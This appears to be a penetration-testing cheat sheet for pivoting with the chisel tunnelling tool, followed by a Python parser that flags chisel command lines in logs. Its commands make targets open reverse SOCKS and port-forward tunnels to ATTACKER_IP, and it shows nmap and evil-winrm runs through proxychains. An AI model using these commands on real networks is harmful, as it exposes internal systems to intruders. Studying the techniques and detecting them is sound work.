Download

# Releases
# https://github.com/jpillora/chisel/releases

# Match target architecture
chisel_linux_amd64
chisel_windows_amd64.exe
chisel_linux_arm64

Reverse SOCKS Proxy

Attacker (Server)

chisel server -p 8000 --reverse

Target (Client)

./chisel client ATTACKER_IP:8000 R:socks

The SOCKS5 proxy is then available on the attacker at 127.0.0.1:1080.

Use with ProxyChains

# /etc/proxychains4.conf
socks5 127.0.0.1 1080

proxychains nmap -sT -p 80,445 INTERNAL_TARGET
proxychains evil-winrm -i INTERNAL_TARGET -u user -p pass

Forward SOCKS Proxy

Target (Server)

./chisel server -p 8000 --socks5

Attacker (Client)

chisel client TARGET:8000 socks

Port Forwarding

Remote Port Forward

Expose an internal service to the attacker.

# Attacker
chisel server -p 8000 --reverse

# Target
./chisel client ATTACKER_IP:8000 R:8888:INTERNAL_IP:80

Access http://127.0.0.1:8888 on the attacker → reaches INTERNAL_IP:80.

Local Port Forward

# Target
./chisel server -p 8000

# Attacker
chisel client TARGET:8000 9999:127.0.0.1:3306

Access 127.0.0.1:9999 on the attacker → reaches the target’s local MySQL.

Multiple Tunnels

./chisel client ATTACKER_IP:8000 R:socks R:8888:10.10.10.5:80 R:9999:10.10.10.5:445

Double Pivot

# Attacker → Host1 → Host2

# Attacker
chisel server -p 8000 --reverse

# Host1
./chisel client ATTACKER_IP:8000 R:1080:socks
./chisel server -p 9000 --reverse

# Host2
./chisel client HOST1_IP:9000 R:1081:socks

Configure proxychains to chain the two proxies in order:

socks5 127.0.0.1 1080
socks5 127.0.0.1 1081

Quick Reference

| Task | Command |
| --- | --- |
| Reverse SOCKS | Server: chisel server -p 8000 --reverse / Client: chisel client IP:8000 R:socks |
| Port forward | Client: chisel client IP:8000 R:LOCAL:REMOTE_IP:REMOTE_PORT |
| SOCKS port | Default 127.0.0.1:1080 |
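
When triaging process-creation logs, the remote specs used throughout this page (R:socks, R:8888:INTERNAL_IP:80, 9999:127.0.0.1:3306) can be parsed to show which listener a chisel client requested and where it forwards. The following Python is an added example, not part of the original page or of chisel itself; the function names and sample command lines are constructed, and it handles only the remote forms shown above.

```python
# Added example: constructed process command lines, not real telemetry.
SAMPLE_CMDLINES = [
    "./chisel client 203.0.113.10:8000 R:socks",
    "./chisel client 203.0.113.10:8000 R:socks R:8888:10.10.10.5:80 R:9999:10.10.10.5:445",
    "chisel client 198.51.100.7:8000 9999:127.0.0.1:3306",
    "ssh-keygen -t ed25519 -C client",
]


def parse_remote(spec):
    """Classify one chisel remote; covers only the forms shown on this page."""
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    if parts[-1] == "socks":
        # "socks" or "PORT:socks"; the listener defaults to port 1080
        port = int(parts[-2]) if len(parts) >= 2 and parts[-2].isdigit() else 1080
        kind, dest = "socks", None
    elif len(parts) == 3 and parts[0].isdigit() and parts[2].isdigit():
        # LISTEN_PORT:DEST_HOST:DEST_PORT
        port, kind, dest = int(parts[0]), "forward", f"{parts[1]}:{parts[2]}"
    else:
        return None
    return {
        "kind": ("reverse-" if reverse else "local-") + kind,
        "listen_port": port,
        "dest": dest,
        # R: remotes open their listener on the chisel server, others on the client
        "listens_on": "server" if reverse else "client",
    }


def chisel_tunnels(cmdline):
    """Return the tunnels requested by a `<bin> client <server> <remote>...` line."""
    argv = cmdline.split()
    if "client" not in argv:
        return []
    # Assumption: no options that take a separate value follow "client"
    args = [a for a in argv[argv.index("client") + 1:] if not a.startswith("-")]
    parsed = [parse_remote(a) for a in args[1:]]  # args[0] is the server address
    return [p for p in parsed if p]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for t in chisel_tunnels(line):
            print(f"{t['kind']:16} port={t['listen_port']:<5} "
                  f"on={t['listens_on']:6} dest={t['dest']}  <- {line}")
```

The match is on argument shape rather than the executable name, so lines that merely contain the word "client" yield no tunnels.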